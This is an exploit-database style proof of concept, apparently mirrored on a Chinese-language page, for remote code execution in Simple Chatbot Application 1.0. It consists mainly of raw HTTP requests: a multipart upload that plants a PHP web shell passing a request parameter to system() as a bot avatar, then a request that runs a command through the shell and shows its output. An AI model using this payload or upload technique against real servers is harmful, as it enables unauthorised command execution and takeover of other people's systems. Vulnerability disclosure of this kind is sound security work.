扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 |
# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE) # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Exploit: You can upload a php shell file as a bot_avatar or user_avatar or image # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474 Content-Length: 1121 Connection: close -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="short_name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="intro" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="no_result" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="img"; filename="" Content-Type: image/jpeg -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php" Content-Type: application/octet-stream <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="user_avatar"; filename="" Content-Type: application/octet-stream -----------------------------55217074722533208072616276474-- # Response HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 <pre>0xSaudi </pre> |
体验盒子
